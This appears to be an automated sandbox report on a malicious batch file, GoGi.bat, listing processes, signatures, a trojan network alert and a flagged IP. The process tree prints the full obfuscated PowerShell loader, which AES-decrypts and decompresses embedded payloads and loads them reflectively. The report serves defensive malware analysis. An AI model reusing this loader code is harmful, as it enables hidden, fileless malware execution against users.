Windows
Analysis Report
GoGi.bat
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- cmd.exe (PID: 6740 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\GoGi. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6760 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6936 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\GoGi.b at" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6956 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 7052 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $host.U I.RawUI.Wi ndowTitle= 'C:\Users\ user\Deskt op\GoGi.ba t';$gPQY=' CmYpnhamYp nnmYpngmYp nemYpnEmYp nxtmYpnenm YpnsmYpnio mYpnnmYpn' .Replace(' mYpn', '') ,'LoaUtEPd UtEP'.Repl ace('UtEP' , ''),'Mai CYgQnMCYgQ odCYgQuleC YgQ'.Repla ce('CYgQ', ''),'SprH TnlitrHTn' .Replace(' rHTn', '') ,'TrrzhRar zhRnsfrzhR orrzhRmFrz hRirzhRnar zhRlBlrzhR orzhRckrzh R'.Replace ('rzhR', ' '),'GetuUb XCuUbXuuUb XruUbXreuU bXntuUbXPu UbXrouUbXc uUbXesuUbX suUbX'.Rep lace('uUbX ', ''),'Fr FEdOomBFEd OasFEdOe64 FEdOStrFEd OiFEdOngFE dO'.Replac e('FEdO', ''),'Reanc lddLncldin encldsncld '.Replace( 'ncld', '' ),'DjPqYej PqYcojPqYm pjPqYrejPq YssjPqY'.R eplace('jP qY', ''),' IPIJhnvPIJ hokPIJhePI Jh'.Replac e('PIJh', ''),'CopZK PiyTZKPioZ KPi'.Repla ce('ZKPi', ''),'ElIX GDeIXGDmIX GDenIXGDtA IXGDtIXGD' .Replace(' IXGD', '') ,'CruXrmeu XrmatuXrme DeuXrmcryu XrmptuXrmo ruXrm'.Rep lace('uXrm ', ''),'EJ uQRntJuQRr JuQRyPJuQR oinJuQRtJu QR'.Replac e('JuQR', '');powers hell -w hi dden;funct ion oukWk( $hMAdX){$u BEEb=[Syst em.Securit y.Cryptogr aphy.Aes]: :Create(); $uBEEb.Mod e=[System. Security.C ryptograph y.CipherMo de]::CBC;$ uBEEb.Padd ing=[Syste m.Security .Cryptogra phy.Paddin gMode]::PK CS7;$uBEEb .Key=[Syst em.Convert ]::($gPQY[ 6])('TGdOe rQan8DiYOI pc1W3E6Uf7 wMJSi91JjP hdKuCB3Q=' );$uBEEb.I V=[System. Convert]:: ($gPQY[6]) ('CruLH9j6 aex2cpz0fo zZ+w==');$ XBRRE=$uBE Eb.($gPQY[ 12])();$go mww=$XBRRE .($gPQY[4] )($hMAdX,0 ,$hMAdX.Le ngth);$XBR RE.Dispose ();$uBEEb. Dispose(); $gomww;}fu nction SIl iJ($hMAdX) {$nQeHe=Ne w-Object S ystem.IO.M emoryStrea m(,$hMAdX) ;$EvPMN=Ne w-Object S ystem.IO.M emoryStrea m;$uxdRy=N ew-Object System.IO. Compressio n.GZipStre am($nQeHe, [IO.Compre ssion.Comp ressionMod e]::($gPQY [8]));$uxd Ry.($gPQY[ 10])($EvPM N);$uxdRy. Dispose(); $nQeHe.Dis pose();$Ev PMN.Dispos e();$EvPMN .ToArray() ;}$WrkBk=[ System.IO. File]::($g PQY[7])([C onsole]::T itle);$dIt wN=SIliJ ( oukWk ([Co nvert]::($ gPQY[6])([ System.Lin q.Enumerab le]::($gPQ Y[11])($Wr kBk, 5).Su bstring(2) )));$Yylgf =SIliJ (ou kWk ([Conv ert]::($gP QY[6])([Sy stem.Linq. Enumerable ]::($gPQY[ 11])($WrkB k, 6).Subs tring(2))) );[System. Reflection .Assembly] ::($gPQY[1 ])([byte[] ]$Yylgf).( $gPQY[13]) .($gPQY[9] )($null,$n ull);[Syst em.Reflect ion.Assemb ly]::($gPQ Y[1])([byt e[]]$dItwN ).($gPQY[1 3]).($gPQY [9])($null ,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - powershell.exe (PID: 7132 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 4296 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- cleanup
System Summary |
---|
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp: | 04/20/24-10:18:04.027368 |
SID: | 2850454 |
Source Port: | 4449 |
Destination Port: | 49730 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
AV Detection |
---|
Source: | URL Reputation: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Networking |
---|
Source: | Snort IDS: |
Source: | TCP traffic: |
Source: | ASN Name: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 6_2_00007FFD9B8A6E20 | |
Source: | Code function: | 6_2_00007FFD9B8BDCA0 | |
Source: | Code function: | 6_2_00007FFD9B8A63C8 | |
Source: | Code function: | 6_2_00007FFD9B8AC93B | |
Source: | Code function: | 6_2_00007FFD9B8AF8D8 | |
Source: | Code function: | 6_2_00007FFD9B8A0E32 | |
Source: | Code function: | 6_2_00007FFD9B8AF4CF |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | Process created: |
Source: | WMI Queries: |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Data Obfuscation |
---|
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Code function: | 6_2_00007FFD9B8B095E | |
Source: | Code function: | 6_2_00007FFD9B8A796A | |
Source: | Code function: | 6_2_00007FFD9B8A786D | |
Source: | Code function: | 6_2_00007FFD9B8A785D |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | WMI Queries: |
Source: | WMI Queries: |
Source: | Last function: |
Source: | File Volume queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Process information queried: | Jump to behavior |
Source: | Process queried: | Jump to behavior |
Source: | Process token adjusted: | Jump to behavior | ||
Source: | Process token adjusted: | Jump to behavior |
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | WMI Queries: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 131 Windows Management Instrumentation | 1 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 14 Security Software Discovery | Remote Services | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 151 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Steganography | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 23 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
8% | ReversingLabs | |||
5% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | URL Reputation | malware | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
true |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
193.222.96.114 | unknown | Germany | 3303 | SWISSCOMSwisscomSwitzerlandLtdCH | true |
Joe Sandbox version: | 40.0.0 Tourmaline |
Analysis ID: | 1429040 |
Start date and time: | 2024-04-20 10:17:05 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 1s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 12 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | GoGi.bat |
Detection: | MAL |
Classification: | mal68.evad.winBAT@11/10@0/1 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
- Excluded IPs from analysis (whitelisted): 23.47.204.74, 23.47.204.72, 23.47.204.46, 23.47.204.58
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
- Not all processes where analyzed, report is missing behavior information
Time | Type | Description |
---|---|---|
10:17:56 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
bg.microsoft.map.fastly.net | Get hash | malicious | Quasar | Browse |
| |
Get hash | malicious | AgentTesla, PureLog Stealer, zgRAT | Browse |
| ||
